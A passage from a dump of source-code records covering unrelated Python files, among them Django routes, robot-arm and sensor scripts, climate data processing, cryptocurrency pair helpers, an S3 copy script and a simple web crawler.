name=\"metadata-manage-ldap\"),\n path(\"metadata/manage/oidc/\", metadata_management, {\"service_type\": \"oidc\"}, name=\"metadata-manage-oidc\"),\n path(\"metadata//\", metadata, name=\"metadata-view\"),\n path(\"redirecturi//\", redirecturi_list, name=\"redirecturi-list\"),\n path(\n \"technical//\",\n login_required(SamlTechnicalInformationUpdate.as_view()),\n name=\"technical-update\",\n ),\n path(\n \"ldap//\",\n login_required(LdapTechnicalInformationUpdate.as_view()),\n name=\"ldap-technical-update\",\n ),\n path(\n \"oidc//\",\n login_required(OidcTechnicalInformationUpdate.as_view()),\n name=\"oidc-technical-update\",\n ),\n path(\n \"serviceprovider/add/saml/\",\n login_required(SamlServiceProviderCreate.as_view()),\n name=\"saml-serviceprovider-add\",\n ),\n path(\n \"serviceprovider/add/ldap/\",\n login_required(LdapServiceProviderCreate.as_view()),\n name=\"ldap-serviceprovider-add\",\n ),\n path(\n \"serviceprovider/add/oidc/\",\n login_required(OidcServiceProviderCreate.as_view()),\n name=\"oidc-serviceprovider-add\",\n ),\n path(\n \"serviceprovider/remove//\",\n login_required(ServiceProviderDelete.as_view()),\n name=\"serviceprovider-delete\",\n ),\n path(\n \"serviceprovider//\",\n login_required(BasicInformationUpdate.as_view()),\n name=\"basicinformation-update\",\n ),\n path(\"saml_admin_list/\", login_required(SAMLAdminList.as_view()), name=\"saml-admin-list\"),\n path(\"statistics/summary/\", statistics_summary_list, name=\"statistics-summary-list\"),\n path(\"statistics//\", 
statistics_list, name=\"statistics-list\"),\n path(\"summary//\", login_required(BasicInformationView.as_view()), name=\"summary-view\"),\n path(\"testuser//\", testuser_list, name=\"testuser-list\"),\n path(\"testuser/data//\", testuser_attribute_data, name=\"testuser-attribute-data\"),\n path(\"usergroup//\", usergroup_list, name=\"usergroup-list\"),\n path(\"invite/\", activate_key, name=\"invite-activate\"),\n path(\"invite//\", activate_key, name=\"invite-activate-key\"),\n path(\"error/\", sp_error, name=\"error\"),\n path(\"\", include(\"django.contrib.auth.urls\")),\n path(\"i18n/\", include(\"django.conf.urls.i18n\")),\n]\n","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":6324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"104987721","text":"# -*- coding: utf-8 -*-\n# @Time : 2017/12/14 23:33\n# @Author : play4fun\n# @File : t1.py\n# @Software: PyCharm\n\n\"\"\"\nt1.py:\n\"\"\"\nfrom time import sleep\nfrom uf.wrapper.swift_api import SwiftAPI\nfrom uf.utils.log import *\n\nlogger_init(logging.VERBOSE)\n# logger_init(logging.DEBUG)\n# logger_init(logging.INFO)\n\nprint('setup swift ...')\n\n# swift = SwiftAPI(dev_port = '/dev/ttyACM0')\n# swift = SwiftAPI(filters = {'hwid': 'USB VID:PID=2341:0042'})\nswift = SwiftAPI() # default by filters: {'hwid': 'USB VID:PID=2341:0042'}\nprint('sleep 2 sec ...')\nsleep(2)\n\nprint('device info: ')\nprint(swift.get_device_info())\nsleep(2)\n# swift.reset()\nswift.set_position(x=300, wait=True)\nsleep(3)\nprint(swift.get_position())\nsleep(3)\nswift.set_position(y=0, wait=True)\nsleep(3)\n\n# swift.set_position(x=200,y=0, z=45, wait=True)\nswift.set_position(z=85, wait=True)\nsleep(2)\nfor x in range(0, 180,30):\n swift.set_wrist(angle=x, wait=True)\n sleep(0.2)\nswift.set_wrist(angle=90, wait=True)\nswift.set_buzzer()\nsleep(2)\nswift.set_position(x=300, y=0, z=110, wait=True)\n\n#\nswift.set_position(x=330, y=0, z=85, wait=True)\nsleep(2)\nfor x in range(0, 180,30):\n swift.set_wrist(angle=x, wait=True)\n sleep(0.2)\nswift.set_wrist(angle=90, wait=True)\nswift.set_buzzer()\nsleep(2)\n\nprint('finished')\ntry:\n while True:\n sleep(1)\nexcept KeyboardInterrupt as e:\n print('KeyboardInterrupt',e)\nfinally:\n swift.reset()\n","sub_path":"毛笔字/t1.py","file_name":"t1.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"363828266","text":"import RPi.GPIO as GPIO\nimport time\nimport threading\n\n\n\nFL_TRIG = 20\nFL_ECHO = 11\nFC_TRIG = 26\nFC_ECHO = 8\nFR_TRIG = 21\nFR_ECHO = 7\n\nclass sonicSensor(object):\n \n def __init__(self,trig,echo):\n self.trig = trig\n self.echo = echo\n self.last_range = 0\n GPIO.setup(self.trig, GPIO.OUT)\n GPIO.setup(self.echo, GPIO.IN)\n GPIO.output(self.trig, False)\n \n def get_range(self):\n if(self.trig < 0 or self.echo < 0):\n return -1\n GPIO.output(self.trig, True)\n time.sleep(0.000001)\n GPIO.output(self.trig,False)\n trig_end = time.time()\n\n pulse_start = time.time()\n pulse_end = 0\n \n #Wait for first instance of echo. 
Time out after 0.001 seconds\n while GPIO.input(self.echo) == 0 and pulse_start-trig_end < 0.001:\n pulse_start = time.time()\n pulse_end = time.time()\n \n while GPIO.input(self.echo) == 1:\n pulse_end = time.time()\n\n \n pulse_duration = pulse_end-pulse_start\n distance = pulse_duration * 17000\n \n self.last_range = distance\n return round(distance,2)\n\nclass SensorArray(object):\n \n def __init__(self):\n GPIO.setmode(GPIO.BCM)\n self.FL = sonicSensor(FL_TRIG,FL_ECHO)\n self.FC = sonicSensor(FC_TRIG,FC_ECHO)\n self.FR = sonicSensor(FR_TRIG,FR_ECHO)\n self.is_on = False\n self.thread = threading.Thread(target = self.Fire)\n \n def Fire(self):\n while self.is_on:\n time.sleep(0.1)\n self.FC.get_range()\n time.sleep(0.1)\n self.FR.get_range()\n time.sleep(0.1)\n self.FL.get_range()\n \n def start(self):\n self.is_on = True\n self.thread.start()\n \n def stop(self):\n self.is_on = False\n","sub_path":"Classes/Sensors.py","file_name":"Sensors.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"193563117","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 26 09:37:34 2015\n\n@author: z1s\n\"\"\"\n\nimport sys\nsys.path.append('/home/z1s/PythonScripts')\nimport binfile_io as fio\nimport amgrid as grid\nfrom scipy.io import netcdf as nc\nimport numpy as np\nimport calendar\nimport matplotlib.pyplot as plt\n\nCp = 1004.64\nLe = 2.500e6\ng = 9.80\nRair = 287.04\nRad = 6371.0e3\n\nbasedir = '/archive/Zhaoyi.Shen/ulm_201510/'\noutdir = '/home/z1s/research/nonlinearity/analysis/npz/1yr/'\nexper = 'imr_t42_'\npert = ['control','2xCO2','m2c40w30','2xCO2+m2c40w30']\nperto = ['ctrl','CO2','m2c40w30','CO2+m2c40w30']\nplat = '/gfdl.ncrc3-default-prod/'\ndiag = 'atmos_level'\ndiago = 'var2d'\nvar = 't_surf'\nvaro = 'tsfc'\nnpert = np.size(pert)\n#npert = 1\nfor i in range(npert):\n atmdir = basedir+exper+pert[i]+plat+'pp/'+diag+'/'\n stafile = atmdir+diag+'.static.nc'\n fs = []\n fs.append(nc.netcdf_file(stafile,'r',mmap=True))\n bk = fs[-1].variables['bk'][:].astype(np.float64)\n pk = fs[-1].variables['pk'][:].astype(np.float64)\n lat = fs[-1].variables['lat'][:].astype(np.float64)\n lon = fs[-1].variables['lon'][:].astype(np.float64)\n phalf = fs[-1].variables['phalf'][:].astype(np.float64)\n zsurf = fs[-1].variables['zsurf'][:].astype(np.float64)\n fs[-1].close()\n nlat = np.size(lat)\n nlon = np.size(lon)\n nphalf = np.size(phalf)\n #%%\n filedir = atmdir+'ts/daily/1yr/'\n yr = np.arange(1,10,1)\n nyr = np.size(yr)\n data = np.zeros([nyr,nphalf-1,nlat])\n #tmpZon = np.zeros([nmon,nlev-1,nlat])\n #phalfZon = np.zeros([nmon,nlev,nlat])\n for yri in range(nyr):\n yrC = '000'+str(yr[yri])+'0101-'+'000'+str(yr[yri])+'1231.'\n filename = filedir+diag+'.'+yrC+var+'.nc'\n fs.append(nc.netcdf_file(filename,'r',mmap=True))\n #pfull = fs[-1].variables['pfull'][:].astype(np.float64)\n tmp = fs[-1].variables[var][:].astype(np.float64) #t,p,lat,lon\n #tmp[np.where(tmp<-999)] = np.nan\n tmp = np.mean(tmp,3)\n data[yri,:,:] = np.mean(tmp,0)\n fs[-1].close()\n #%%\n #outfile = outdir+'dim.'+perto[i]+'_sigma.npz'\n #fio.save(outfile,lat=lat,lon=lon,phalf=phalf,pfull=pfull)\n outfile = outdir+diago+'.'+perto[i]+'_sigma.npz'\n fio.save(outfile,**{varo:data})\n \n","sub_path":"driver/calc_var2d_ts_1yr.py","file_name":"calc_var2d_ts_1yr.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"17255222","text":"import 
sys\r\nsys.path.append(\"..\")\r\nclass CurrencyPair:\r\n\r\n @classmethod\r\n def get_all_currency_pairs(cls, market, account=None, user_id=None):\r\n market=str(market).lower()\r\n if market=='digifinex':\r\n from packages import digifinex as DIGIFINEX\r\n digifinex=DIGIFINEX.DigiFinex(account)\r\n tickers=digifinex.ticker()\r\n # 在digiFinex返回的tickers数据结构里,每个项的vol字段的值指的是base的成交量,而不是reference的成交量,所以首先要变成reference成交量\r\n currency_pairs={\r\n 'usdt':[],\r\n 'btc':[],\r\n 'usdt2':[],\r\n 'eth':[],\r\n 'dft':[]\r\n }\r\n # currency_pairs_in_reference_of_btc=[]\r\n # currency_pairs_in_reference_of_usdt = []\r\n # currency_pairs_in_reference_of_usdt2 = []\r\n # currency_pairs_in_reference_of_eth = []\r\n # currency_pairs_in_reference_of_dft = []\r\n for item in dict(tickers).keys():\r\n base=str(item).split('_')[1]\r\n reference=str(item).split('_')[0]\r\n currency_pair=CurrencyPair(base,reference)\r\n vol=tickers[item]['vol']*tickers[item]['last']\r\n currency_pairs[reference].append({\r\n 'currency_pair':currency_pair,\r\n 'vol':vol,\r\n 'reference':reference\r\n })\r\n # sorted(x, key=lambda x : x['name'], reverse=True)\r\n for item in currency_pairs.keys():\r\n currency_pairs[item]=sorted(currency_pairs[item], key=lambda x : x['vol'], reverse=True)\r\n if market=='aex':\r\n from packages import aex as AEX\r\n aex=AEX.AEX(account, user_id)\r\n tickers={}\r\n tickers['cny']=aex.ticker(CurrencyPair('all','cny'),True)\r\n tickers['usdt']=aex.ticker(CurrencyPair('all','usdt'),True)\r\n # 在digiFinex返回的tickers数据结构里,每个项的vol字段的值指的是base的成交量,而不是reference的成交量,所以首先要变成reference成交量\r\n _tickers={}\r\n for key1 in tickers.keys():\r\n for key2 in tickers[key1]:\r\n if key1+'_'+key2=='usdt_tusd' or key1+'_'+key2=='usdt_pax':\r\n continue\r\n _tickers[key1+'_'+key2]=tickers[key1][key2]['ticker']\r\n tickers=_tickers\r\n currency_pairs={\r\n 'usdt':[],\r\n 'cny':[]\r\n }\r\n for item in dict(tickers).keys():\r\n base=str(item).split('_')[1]\r\n reference=str(item).split('_')[0]\r\n currency_pair=CurrencyPair(base,reference)\r\n vol=tickers[item]['vol']*tickers[item]['last']\r\n currency_pairs[reference].append({\r\n 'currency_pair':currency_pair,\r\n 'vol':vol,\r\n 'reference':reference\r\n })\r\n # sorted(x, key=lambda x : x['name'], reverse=True)\r\n for item in currency_pairs.keys():\r\n currency_pairs[item]=sorted(currency_pairs[item], key=lambda x : x['vol'], reverse=True)\r\n return currency_pairs\r\n\r\n @classmethod\r\n def get_top_n_currency_pairs_adjusted_by_vol(cls,market, account=None, top_n=5, user_id=None):\r\n currency_pairs=CurrencyPair.get_all_currency_pairs(market,account, user_id)\r\n for item in currency_pairs.keys():\r\n currency_pairs[item]=currency_pairs[item][:top_n]\r\n return currency_pairs\r\n\r\n @classmethod\r\n def find_triangle_arbitragable_currency_pairs(cls,market, account=None, top_n=5, user_id=None):\r\n currency_pairs=CurrencyPair.get_top_n_currency_pairs_adjusted_by_vol(market,account,top_n, user_id)\r\n arbitragable_keypairs=[]\r\n _currency_pairs=[]\r\n for item in currency_pairs.keys():\r\n for item2 in currency_pairs[item]:\r\n _currency_pairs.append(item2['currency_pair'])\r\n for i in range(0,len(_currency_pairs)):\r\n cp1=_currency_pairs[i]\r\n for j in range(i+1,len(_currency_pairs)):\r\n cp2=_currency_pairs[j]\r\n for k in range(j+1,len(_currency_pairs)):\r\n cp3=_currency_pairs[k]\r\n currencies=[]\r\n currencies.append(cp1.base)\r\n currencies.append(cp1.reference)\r\n currencies.append(cp2.base)\r\n currencies.append(cp2.reference)\r\n 
currencies.append(cp3.base)\r\n currencies.append(cp3.reference)\r\n distinctive_currencies=list(set(currencies))\r\n if currencies.count(distinctive_currencies[0])==2 and currencies.count(distinctive_currencies[1])==2 and currencies.count(distinctive_currencies[2])==2:\r\n arbitragable_keypairs.append([cp1,cp2,cp3])\r\n\r\n a=1\r\n return arbitragable_keypairs\r\n\r\n\r\n def __init__(self,base='btc', reference='usdt'):\r\n self.base=base\r\n self.reference=reference\r\n\r\n def subtract(self, other):\r\n if other==self.base:\r\n return self.reference\r\n if other==self.reference:\r\n return self.base\r\n else:\r\n return None\r\n\r\n def equals(self, other):\r\n if self.base==other.base and self.reference==other.reference:\r\n return True\r\n else:\r\n return False\r\n\r\n def contains(self, currency):\r\n if self.base==currency or self.reference==currency:\r\n return True\r\n else:\r\n return False\r\n\r\n def toString(self):\r\n return self.base+'_'+self.reference\r\n\r\n def get_currency_pair(self):\r\n return self.base+'_'+self.reference\r\n\r\n def get_referencial_currencies(self, market):\r\n market=str(market).lower()\r\n if market==\"okex\":\r\n return [\"btc\",\"usdt\",\"eth\",\"bch\"]\r\n elif market==\"chbtc\" or market==\"zb\":\r\n pass\r\n elif market==\"???\":\r\n pass\r\n else:\r\n pass\r\n\r\n def get_referencial_currency(self, string):\r\n try:\r\n reference=str(string).split(\"_\")[1]\r\n except Exception as e:\r\n reference=None\r\n return reference\r\n\r\n def get_base_currency(self, string):\r\n try:\r\n reference=str(string).split(\"_\")[0]\r\n except Exception as e:\r\n reference=None\r\n return reference\r\n\r\nclass Currency:\r\n\r\n def __init__(self, name):\r\n self.name=name","sub_path":"packages/currency_pair.py","file_name":"currency_pair.py","file_ext":"py","file_size_in_byte":6689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"258648862","text":"def expand_array(a):\n alphas = [x for x in a if x.isalpha()]\n nums = []\n\n x = 1\n\n while x < len(a):\n if a[x].isnumeric() and a[x - 1].isnumeric():\n nums[-1] += a[x]\n elif a[x].isnumeric():\n nums.append(a[x])\n\n x+=1\n\n print(\"\".join([alphas[i] * int(nums[i]) for i in range(len(alphas))]))\n\nexpand_array(\"a3b1c1d1e4f0g11\")","sub_path":"expand-array.py","file_name":"expand-array.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"583750359","text":"import logging\nfrom datetime import timedelta\n\nfrom django.conf import settings\nfrom django.utils import timezone\nfrom elasticsearch import Elasticsearch\n\nfrom shared.audit_log.models import AuditLogEntry\n\nES_STATUS_CREATED = \"created\"\nLOGGER = logging.getLogger(__name__)\n\n\ndef send_audit_log_to_elastic_search():\n if not (\n settings.ELASTICSEARCH_CLOUD_ID\n and settings.ELASTICSEARCH_API_ID\n and settings.ELASTICSEARCH_API_KEY\n ):\n LOGGER.warning(\n \"Trying to send audit log to Elasticsearch without proper configuration, process skipped\"\n )\n return\n es = Elasticsearch(\n cloud_id=settings.ELASTICSEARCH_CLOUD_ID,\n api_key=(settings.ELASTICSEARCH_API_ID, settings.ELASTICSEARCH_API_KEY),\n )\n entries = AuditLogEntry.objects.filter(is_sent=False).order_by(\"created_at\")\n\n for entry in entries:\n rs = es.index(\n index=settings.ELASTICSEARCH_APP_AUDIT_LOG_INDEX,\n id=entry.id,\n body=entry.message,\n )\n if rs.get(\"result\") == ES_STATUS_CREATED:\n entry.is_sent = True\n 
entry.save()\n\n\ndef clear_audit_log_entries(days_to_keep=30):\n # Only remove entries older than `X` days\n sent_entries = AuditLogEntry.objects.filter(\n is_sent=True, created_at__lte=(timezone.now() - timedelta(days=days_to_keep))\n )\n sent_entries.delete()\n","sub_path":"backend/shared/shared/audit_log/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"523853035","text":"from torch import optim, nn\n\nfrom ..models.model import Model\nfrom ..utils import tolist\nfrom ..losses import StochasticReconstructionLoss\n\n\nclass VAE(Model):\n \"\"\"\n Variational Autoencoder\n\n [Kingma+ 2013] Auto-Encoding Variational Bayes\n \"\"\"\n def __init__(self, encoder, decoder,\n other_distributions=[],\n regularizer=[],\n optimizer=optim.Adam,\n optimizer_params={}):\n\n # set distributions (for training)\n distributions = [encoder, decoder] + tolist(other_distributions)\n\n # set losses\n reconstruction =\\\n StochasticReconstructionLoss(encoder, decoder)\n loss = (reconstruction + regularizer).mean()\n\n super().__init__(loss, test_loss=loss,\n distributions=distributions,\n optimizer=optimizer, optimizer_params=optimizer_params)\n\n def train(self, train_x={}, **kwargs):\n return super().train(train_x, **kwargs)\n\n def test(self, test_x={}, **kwargs):\n return super().test(test_x, **kwargs)\n","sub_path":"pixyz/models/vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"596490870","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom multiprocessing import Process, Queue, JoinableQueue, cpu_count\nimport sys\nimport os\n\nfrom ElProduction import ExclusiveElProduction, DynamicScaleFactors\nimport Util\n\n# compute all data points\nclass ExclusiveRunner:\n\t__qIn = JoinableQueue()\n\t__qOut = Queue()\n\tdef add(self,e):\n\t\t\"\"\"\n\t\tadds an element\n\t\t@param e element\n\t\t\"\"\"\n\t\tself.__qIn.put(e)\n\tdef run(self,nProcesses = cpu_count()):\n\t\t\"\"\"\n\t\tcomputes all elements\n\t\t@param nProcesses number of parallel threads\n\t\t\"\"\"\n\t\t# add EOF\n\t\tlenParams = self.__qIn.qsize()\n\t\tfor n in xrange(nProcesses):\n\t\t\tself.__qIn.put(None)\n\t\t# setup PDFs\n\t\tUtil.setupPDFs()\n\t\t# start processes\n\t\tthreadArgs = (self.__qIn, self.__qOut)\n\t\tprocesses = []\n\t\tfor j in xrange(nProcesses):\n\t\t\tprocesses.append(Process(target=_threadWorker, args=threadArgs))\n\t\t[p.start() for p in processes]\n\t\t# run\n\t\ttry:\n\t\t\tself.__qIn.join()\n\t\texcept KeyboardInterrupt:\n\t\t\t[p.terminate() for p in processes]\n\t\t\tprint\n\t\t\tUtil.pWarn(\"aborting at %d/%d\"%((lenParams-self.__qIn.qsize()),lenParams))\n\t\t\tself.__qIn.close()\n\t\tself.__qIn.close()\n\t\t# remap\n\t\tlOut = []\n\t\tfor j in xrange(lenParams):\n\t\t\tlOut.append(self.__qOut.get())\n\t\tself.__qOut.close()\n\t\treturn lOut\n\n# thread worker\ndef _threadWorker(qIn, qOut):\n\twhile True:\n\t\t# get\n\t\tp = qIn.get()\n\t\tif None == p: # EOF?\n\t\t\tqIn.task_done()\n\t\t\tbreak\n\t\t# setup\n\t\to = ExclusiveElProduction(*p[\"objArgs\"])\n\t\to.setPdf(*p[\"pdf\"])\n\t\to.setLambdaQCD(p[\"lambdaQCD\"])\n\t\tif p.has_key(\"mu2\"): o.setMu2 (DynamicScaleFactors(*p[\"mu2\"]))\n\t\tif p.has_key(\"muR2\"): o.setMuR2(DynamicScaleFactors(*p[\"muR2\"]))\n\t\tif p.has_key(\"muF2\"): o.setMuF2(DynamicScaleFactors(*p[\"muF2\"]))\n\t\tif 
p.has_key(\"bjorkenX\"): o.setBjorkenX(p[\"bjorkenX\"])\n\t\tif p.has_key(\"hadronicS\"): o.setHadronicS(p[\"hadronicS\"])\n\t\tif p.has_key(\"activatedHistograms\"):\n\t\t\tfor e in p[\"activatedHistograms\"]:\n\t\t\t\to.activateHistogram(*e)\n\t\tif p.has_key(\"calls\"): \t\to.MCparams.calls = p[\"calls\"]\n\t\tif p.has_key(\"iterations\"): \to.MCparams.iterations = p[\"iterations\"]\n\t\tif p.has_key(\"bins\"): \t\to.MCparams.bins = p[\"bins\"]\n\t\tif p.has_key(\"adaptChi2\"): \to.MCparams.adaptChi2 = p[\"adaptChi2\"]\n\t\tif p.has_key(\"verbosity\"): \to.MCparams.verbosity = p[\"verbosity\"]\n\t\t# run\n\t\tp[\"res\"] = o.F(p[\"orderFlag\"],p[\"channelFlag\"])\n\t\tqOut.put(p)\n\t\tqIn.task_done()\n\t\tif p.has_key(\"msg\"): Util.pSucc(p[\"msg\"])\n","sub_path":"py/ExclusiveRunner.py","file_name":"ExclusiveRunner.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"29747784","text":"#! /home/tony/anaconda3/bin/python\nimport subprocess\nimport os.path\nfrom pprint import pprint\nimport time\n\nbucketIn = 's3://ga-odc-eros-cog-west/'\nbucketOut = 's3://ga-odc-eros-archive-west/'\n\nhomeDir='/home/ubuntu'\n\nBigcnt=0\nBigtime1 = 0;\nBigtime0 = time.time()\n\n\ndef subprocess_cmd(command):\n process = subprocess.Popen(command,stdout=subprocess.PIPE, shell=True)\n proc_stdout = process.communicate()[0].strip()\n stupidBytesObject = proc_stdout\n outStr = (stupidBytesObject.decode(\"utf-8\"))\n print(outStr)\n return(outStr)\n\ndef s3CopyFile(fromfile, tofile):\n\tprint (\"hello from s3CopyFile copying file \" + fromfile)\n\tinfile = \"'\" + bucketIn + fromfile + \"'\"\n\toutfile = \"'\" + bucketOut + tofile + \"'\"\n\tpushcmd = \"aws s3 cp %s %s\" % (infile, outfile)\n\tprint (pushcmd)\n\tsubprocess_cmd(pushcmd)\n\ndef mkFileName(filename, prefix, extension):\n a = filename.split('/')\n cell = a[0]\n file = a[1]\n dir = file.split('.xml')[0]\n file = dir + ext\n subdirs = \"%s/%s/%s/\" % (cell,dir,prefix)\n print (subdirs)\n root= 'exp/'\n fullDir=root + subdirs + file\n print (fullDir)\n return(fullDir)\n\ndef tarFileName(xmlFile, extension):\n file = xmlFile.split('.xml')[0] + extension\n return(file)\n\n\n# get the file list\n\nfileExtensions = ['.tif', '.xml']\n\n\ns3CopyFile(fromfile=\"AAlist.html\", tofile=\"AAlist.html\")\nmyfile = \"./cogxml.txt\"\n#myfile = \"./singlexml.txt\"\nwith open(myfile) as f:\n for line in f:\n line = line.rstrip()\n #print (line)\n a = line.split('h03v03/')\n id = 'h03v03/' + a[1]\n print (id)\n for ext in fileExtensions:\n pre = 'TIF'\n bucketFile = mkFileName(filename=id, prefix=pre, extension=ext)\n #print(\"bucketFile is %s\" % bucketFile)\n fromfile = id.split('.xml')[0] + ext\n s3CopyFile(fromfile=fromfile, tofile=bucketFile)\n Bigcnt = Bigcnt + 1\n print (\"BIGCNT = %d\" % Bigcnt)\n\nBigtime1 = time.time()\n\nelapsed = Bigtime1 - Bigtime0\n\nprint (\"TOTAL Bucket loading time for these files took %.2f seconds\" % elapsed)\n\n","sub_path":"00proj/python/buntar/cptiff.py","file_name":"cptiff.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"493029713","text":"from rest_framework import serializers\n\nfrom babies.models import Baby\nfrom parents.serializers import ParentSerializer\n\n\nclass BabySerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Baby\n fields = (\n 'id',\n 'first_name',\n 'last_name',\n 'age',\n 'parent'\n 
)","sub_path":"babies/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"473545428","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .tree import Tree, DeepCrawl\nfrom .observer import TreeNotifier\n\n\ndef tree(request):\n if request.POST:\n tree_notifier = TreeNotifier()\n for i in range(1, 5):\n tree_notifier.detach('Check' + str(i))\n for i in range(1, 5):\n if request.POST.get('Check' + str(i)) == 'on':\n tree_notifier.attach('Check' + str(i))\n answer = tree_notifier.createTree()\n # for i in answer['clients']:\n # print(i)\n return render(request, 'tree.html', answer)\n return render(request, 'tree.html', {})","sub_path":"tree/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"442454787","text":"import sys\nimport requests\nimport logging\n\nimport defaults\n\nlogging.basicConfig(filename='wikiware.log',level=logging.DEBUG)\n\nlogger = logging.getLogger('wikiware-fetcher')\n\nclass WikiwareFetch(object):\n \"\"\" Fetch content from Wikipedia \"\"\"\n\n def __init__(self):\n \"\"\" Mediawiki API query \"\"\"\n\n self.user_agent = {\n 'User-agent': 'python-request-{}'.format(sys.version.split()[0]),\n }\n\n self.headers = self.user_agent\n\n def fetch_api(self, title, format=\"json\"):\n \"\"\" dump Wikipedia article \"\"\"\n\n self.url = defaults.WIKIWARE_API_URL\n self.params = {\n 'titles': title,\n 'format': format,\n 'action': 'query',\n 'prop': 'revisions',\n 'rvprop': 'content',\n 'redirects': '',\n }\n\n r = requests.get(self.url, params=self.params, headers=self.headers)\n if r.status_code != requests.codes.ok:\n logger.error('Fetch Failed: Title={0}, Status={1}'.format(title, r.status_code))\n return ''\n\n text = r.json()\n try:\n pages = text['query']['pages']\n except:\n logger.error('No pages returned: Title={0}, Status={1}'.format(title, r.status_code))\n return ''\n revision = ''\n for page in pages:\n try:\n revision = pages[page]['revisions'][0]['*']\n except:\n pass\n break\n\n if not revision:\n logger.error('No revisions found: Title={0}, Status={1}'.format(title, r.status_code))\n return revision\n\n def fetch_en(self, title, printable=True):\n \"\"\" dump Wikipedia article in HTML \"\"\"\n\n self.url = defaults.WIKIWARE_EN_URL\n self.params = {\n 'title': title,\n 'printable': 'yes' if printable else 'no',\n }\n r = requests.get(self.url, params=self.params, headers=self.headers)\n return r.text\n\n\n\n\n\n\n\n","sub_path":"wikiware/fetcher.py","file_name":"fetcher.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"631890242","text":"import sys\n\ndef get_page(url):\n try:\n import requests\n r = requests.get(url)\n return r.text\n except:\n return \"\"\n\ndef get_next_target(page):\n start_link = page.find('href=')\n if start_link == -1:\n return None, 0\n start_quote = page.find('\"', start_link)\n end_quote = page.find('\"', start_quote + 1)\n url = page[start_quote + 1:end_quote]\n return url, end_quote\n\ndef union(p, q):\n for e in q:\n if e not in p:\n p.append(e)\n\ndef get_all_links(page):\n links = []\n while True:\n url, endpos = get_next_target(page)\n if url:\n links.append(url)\n page = page[endpos:]\n else:\n break\n return links\n\ndef 
crawl_web(seed, max_depth):\n    # seed : the page we start crawling from\n    # tocrawl : pages still to be crawled\n    # crawled : pages that have already been crawled\n    tocrawl = [seed]\n    crawled = []\n    next_depth = []\n    depth = 0\n    while tocrawl and depth <= max_depth:\n        page = tocrawl.pop()\n        if page not in crawled:\n            union(next_depth, get_all_links(get_page(page)))\n            crawled.append(page)\n        if not tocrawl:\n            tocrawl, next_depth = next_depth, []\n            depth = depth + 1\n    return crawled\n\nmax_depth = 1\nlinks = crawl_web(sys.stdin.read(), max_depth)\nfor x in links:\n    print(x)\n","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"}
+{"seq_id":"227920428","text":"from django.shortcuts import render, redirect as redir\nfrom django.utils.crypto import get_random_string\n\n\n\ndef index(request):\n    if \"count\" not in request.session:\n        request.session[\"count\"] = 0\n    if \"random\" not in request.session:\n        return redir(\"/random\")\n    else:\n        if request.method == \"GET\":\n            return render(request, \"index.html\")\n        if request.method == \"POST\":\n            return redir(\"/random\")\n\n\ndef random(request):\n    if request.method == \"GET\":\n        request.session[\"random\"] = get_random_string(length=14)\n\n    request.session[\"count\"] += 1\n    return redir(\"/\")\n\ndef reset(request):\n    if request.method ==\"GET\":\n        request.session[\"count\"] = 0\n    return redir(\"/\")","sub_path":"apps/rng_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"}
+{"seq_id":"140824462","text":"gans = []\r\nfound = []\r\nex_time = []\r\navg_per_gen = []\r\n\r\ndef new_trial(f):\r\n    global gans\r\n    global found\r\n    global ex_time\r\n    f.readline()\r\n    gans.append(int(f.readline()[5:]))\r\n    val = f.readline()[7:][:-1]\r\n    if val == \"True\":\r\n        found.append(True)\r\n    else:\r\n        found.append(False)\r\n    val = f.readline()[9:][:-2]\r\n    ex_time.append(float(val))\r\n\r\nwith open(\"RESULT.txt\") as f:\r\n    while f.read(1) != '':\r\n        new_trial(f)\r\n        while f.readline() != \"\\n\":\r\n            pass\r\n\r\ngen_avg = 0\r\nfor val in gans:\r\n    gen_avg += val\r\ngen_avg /= 20\r\n\r\ns_rate = 0\r\nfor val in found:\r\n    if val:\r\n        s_rate += 1\r\ns_rate *= 5\r\n\r\next_avg = 0\r\nfor val in ex_time:\r\n    ext_avg += val\r\next_avg /= 20\r\n\r\nsum_till = int(round(gen_avg, 0))\r\nprint(sum_till)\r\n\r\nwith open(\"PRESULT.txt\", 'w') as f:\r\n    